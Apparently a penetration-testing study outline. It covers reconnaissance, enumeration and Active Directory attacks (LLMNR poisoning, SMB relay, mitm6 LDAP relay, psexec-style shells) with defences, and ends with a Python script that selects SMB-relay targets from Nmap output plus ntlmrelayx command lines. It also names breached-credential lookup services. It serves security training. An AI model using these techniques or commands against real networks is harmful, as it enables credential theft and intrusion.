Penetration Testing: Scanning & Enumeration
(mind map; reconstructed below as an outline, one branch per section)

Reconnaissance
- Scoping paperwork
  - Mutual Non-Disclosure Agreement (NDA)
  - Master Service Agreement (MSA): outlines the responsibilities of both parties; Rapid7 MSA example: https://www.rapid7.com/legal/msa/
  - Performance objectives
- Identify Target
  - bugcrowd.com (program scope pages)
- Target Validation
  - WHOIS
  - nslookup
  - dnsrecon
- Finding Subdomains
  - Google Fu
  - dig
  - Nmap
  - Sublist3r
  - Bluto
  - crt.sh (certificate transparency logs)
  - OWASP Amass
  - Tomnomnom httprobe (check which discovered subdomains actually answer on HTTP/HTTPS)
- Fingerprinting: identify website technologies
  - Nmap overview scan
  - Wappalyzer
  - WhatWeb
  - BuiltWith
  - Netcat (banner grabbing)
  - Information gathering with Burp Suite
- Data breaches / breached credentials
  - HaveIBeenPwned
  - Breach-Parse
  - WeLeakInfo
  - scylla.sh (query syntax: email:*bbc.co.uk, email:username*)
  - leakedsource.ru
- Email address gathering
  - Hunter.io (Domain Search)
  - theHarvester (OSINT)
- Social media
  - Google Fu
  - LinkedIn
  - Twitter

Scanning & Enumeration
- Host Discovery
  - Netdiscover
  - arp-scan
  - Nmap
- Scanning
  - Nmap
  - Masscan
  - Metasploit
  - Nessus
  - Nikto
- HTTP/HTTPS
  - Dirbuster
  - Dirb
  - Gobuster
  - Source code review
  - Burp Suite
  - Test server upload: Davtest (WebDAV)
- SMB Enumeration
  - msfconsole: auxiliary/scanner/smb/smb_version
  - smbclient
  - enum4linux (not working properly)
- SSH
  - Connection attempt (banner / version)
- FTP
  - Anonymous access
  - binary (switch to binary mode before transferring files)
- Network (from a compromised Windows host)
  - ipconfig /all
  - arp -a
  - route print
  - netstat -ano
- Vulnerability Research
  - Google
  - Searchsploit
  - Exploit Database
  - Metasploit: search

Initial Attack Vectors
- LLMNR Poisoning
  - Responder answers LLMNR, NBT-NS and DNS/mDNS name requests so that the victim authenticates to the attacker
  - Capturing NTLMv2 hashes: Responder
  - Password cracking: Hashcat (NetNTLMv2 is hashcat mode 5600)
  - Defences
    - Disable LLMNR and NBT-NS (LLMNR: policy "Turn off multicast name resolution", i.e. EnableMulticast = 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient; NBT-NS: NetbiosOptions = 2 per interface under HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces)
    - Require Network Access Control
    - Require strong user passwords
- SMB Relay Attacks
  - Precondition: SMB signing disabled or not required on the target (Nmap script smb2-security-mode); the relayed account must have admin rights on the target for the actions below
  - Responder.conf: HTTP = Off, SMB = Off, so Responder only poisons and ntlmrelayx handles the connections
  - ntlmrelayx relays the captured authentication to the target list
  - Results: SAM hash dump (crack offline, or Pass-the-Hash); interactive shell (-i); command execution (-c); execute an .exe (-e)
  - Payloads: PowerShell reverse shell (msf web_delivery), msfvenom meterpreter, other
  - Defences
    - Enable SMB signing on all devices: completely stops the attack; performance issues with file copy
    - Disable NTLM authentication: stops the attack; but if Kerberos stops working, Windows falls back to NTLM
    - Account tiering: admins log in only to their own tier of accounts / servers / domain controllers
    - Local admin restriction: no local admin rights prevents lateral movement
- Gaining shell access (with relayed or cracked credentials)
  - msfconsole: exploit/windows/smb/psexec, exploit/windows/smb/psexec_psh
  - psexec.py: noisy, flagged by AV
  - smbexec.py: less noisy / half-shell
  - wmiexec.py: less noisy / half-shell
- IPv6 Attacks
  - mitm6 (spoofs DHCPv6 to become the victim's DNS server)
  - LDAP relay: ntlmrelayx -6 -t ldaps://<dc> -wh fakewpad.<domain> -l lootme
  - Loot: info dump (loot folder); new user creation on the DC when an admin authenticates; delegated access (aclpwn can restore the changes afterwards)
  - Easy win: get an account created on the Domain Controller; get the loot back
  - Defences
    - Disable IPv6: possible unwanted side effects; define block rules instead of allow rules in the firewall
    - Disable WPAD if not in use
    - Enable LDAP signing and channel binding (usually not enabled)
    - Put admin users into the Protected Users group (prevents impersonation or delegation)
- Other Attack Vectors and Strategies
  - Day begins with a Nessus scan and an Nmap scan
  - Morning: pick up targets / hashes for SMB relay attacks; look for SMB open / signing disabled
  - Afternoon: relay hashes
  - Look at logins; check for default creds
  - Responder: run early morning and at lunch time (login peaks); looking for hashes. Are they giving us hashes? Are those hashes easy to crack? Easy win. See how the network responds: if LLMNR is disabled the client might have had a pentest before and might know the common attacks
  - mitm6: early morning, lunch time
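The SMB relay branch and the "Morning: look for SMB open / signing disabled" strategy both depend on turning an Nmap smb2-security-mode scan into a target list for ntlmrelayx. The script below is an added example, not code from the page or from Nmap/impacket: it parses Nmap's normal (-oN) output, tracks the current host, and keeps only hosts whose signing result says signing is not enforced. The Nmap text it reads is a constructed sample (hosts 10.10.10.5, .7, .9 and dc01.corp.local), not a real scan; the matched strings are the ones the smb2-security-mode and smb-security-mode NSE scripts print.

```python
"""Select SMB relay targets from Nmap -oN output (added example)."""
import re
import sys

# Constructed sample of Nmap normal output for four hosts; not a real scan.
SAMPLE_NMAP = """\
Nmap scan report for 10.10.10.5
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for dc01.corp.local (10.10.10.10)
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.10.10.7
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap scan report for 10.10.10.9
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp filtered microsoft-ds
"""

# "Nmap scan report for 10.0.0.1" or "Nmap scan report for name (10.0.0.1)"
HOST_RE = re.compile(r"^Nmap scan report for (?:.*\()?(\d+\.\d+\.\d+\.\d+)\)?\s*$")

# Strings emitted by the NSE scripts. "supported" (SMB1 script) means enabled but not required.
RELAYABLE = (
    "Message signing enabled but not required",  # smb2-security-mode
    "message_signing: disabled",                 # smb-security-mode
    "message_signing: supported",                # smb-security-mode
)
REQUIRED = ("Message signing enabled and required", "message_signing: required")


def classify(nmap_output: str) -> dict:
    """Map each scanned IP to 'relayable', 'required', or 'unknown' (no signing result seen)."""
    result, host = {}, None
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            result[host] = "unknown"
            continue
        if host is None:
            continue
        if any(s in line for s in RELAYABLE):
            result[host] = "relayable"
        elif any(s in line for s in REQUIRED):
            result[host] = "required"
    return result


def relay_targets(nmap_output: str) -> list:
    """IPs to feed to ntlmrelayx -tf; hosts that require signing are dropped."""
    return [ip for ip, state in classify(nmap_output).items() if state == "relayable"]


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP
    print("\n".join(relay_targets(text)))
```

Typical use: scan with `nmap -p 445 --script smb2-security-mode -oN smb.txt 10.10.10.0/24`, write the script's output to targets.txt, set SMB = Off and HTTP = Off in Responder.conf so Responder only poisons, then run `ntlmrelayx.py -tf targets.txt -smb2support`. Domain controllers normally show "enabled and required" and are correctly excluded; a host with "unknown" was not probed (port 445 filtered in the sample) rather than confirmed safe.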